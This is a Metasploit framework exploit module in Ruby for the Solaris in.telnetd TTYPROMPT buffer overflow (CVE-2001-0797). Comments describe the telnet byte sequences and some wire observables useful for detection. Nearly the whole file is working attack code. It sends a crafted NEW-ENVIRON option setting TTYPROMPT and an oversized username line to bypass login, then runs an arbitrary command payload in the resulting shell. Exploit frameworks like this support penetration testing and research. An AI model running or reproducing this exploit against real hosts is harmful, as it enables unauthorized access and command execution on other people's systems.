GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/telnet/ttyprompt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints,
  # targets) and the module's options.
  #
  # @param info [Hash] base info hash merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
      'Description'    => %q{
          This module uses a buffer overflow in the Solaris 'login'
        application to bypass authentication in the telnet daemon.
      },
      'Author'         => [ 'MC', 'cazz' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-0797'],
          [ 'OSVDB', '690'],
          [ 'BID', '5531'],

        ],
      'Privileged'     => false,
      'Platform'       => %w{ solaris unix },
      # The payload is a shell command string, not native code: it is
      # typed into the shell obtained from in.telnetd (see #exploit).
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', { }],
        ],
      'DisclosureDate' => '2002-01-18',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(23),
        # Account name sent in the oversized login line; defaults to "bin".
        OptString.new('USER', [ true, "The username to use", "bin" ]),
      ])
  end

  # Runs the module: connect, send telnet option negotiation carrying a
  # NEW-ENVIRON TTYPROMPT variable, send the oversized username line,
  # then run the command payload in the resulting shell and hand off to
  # the payload handler.
  #
  # Wire observables for detection: a NEW-ENVIRON (option 39) suboption
  # setting TTYPROMPT, immediately followed by a login line far longer
  # than any legitimate username.
  def exploit
    connect

    # Drains the server's initial output; the value is never used below.
    banner = sock.get_once

    print_status('Setting TTYPROMPT...')

    # Telnet option negotiation (RFC 854): 0xff = IAC, 0xfb = WILL,
    # 0xfc = WONT, 0xfa = SB, 0xf0 = SE. The suboption block is
    # NEW-ENVIRON (RFC 1572, option 0x27): IS (0x00), VAR (0x00)
    # "TTYPROMPT", VALUE (0x01), then six random alphanumerics.
    req =
      "\xff\xfc\x18" +            # WONT TERMINAL-TYPE
      "\xff\xfc\x1f" +            # WONT NAWS
      "\xff\xfc\x21" +            # WONT TOGGLE-FLOW-CONTROL
      "\xff\xfc\x23" +            # WONT X-DISPLAY-LOCATION
      "\xff\xfb\x22" +            # WILL LINEMODE
      "\xff\xfc\x24" +            # WONT (old) ENVIRON
      "\xff\xfb\x27" +            # WILL NEW-ENVIRON
      "\xff\xfb\x00" +            # WILL BINARY
      "\xff\xfa\x27\x00" +        # SB NEW-ENVIRON IS
      "\x00TTYPROMPT" +           # VAR "TTYPROMPT"
      "\x01" +                    # VALUE
      rand_text_alphanumeric(6) +
      "\xff\xf0"                  # SE

    sock.put(req)
    # Kernel#select with no IO sets and a timeout: a 0.25 s pause.
    select(nil,nil,nil,0.25)

    print_status('Sending username...')

    # 1..10 random letters, repeated as 65 space-separated fields after
    # the username; this oversized line is the overflow described in
    # 'Description'.
    filler = rand_text_alpha(rand(10) + 1)

    # NOTE: req still holds the negotiation bytes above, so the next
    # put re-sends them together with the username line.
    req << datastore['USER'] + (" #{filler}" * 65)

    sock.put(req + "\n\n\n")

    select(nil,nil,nil,0.25)
    # Discard whatever the server returned after the login line.
    sock.get_once

    # Run the command payload detached from the session, output discarded.
    sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")

    select(nil,nil,nil,0.25)

    handler
  end
end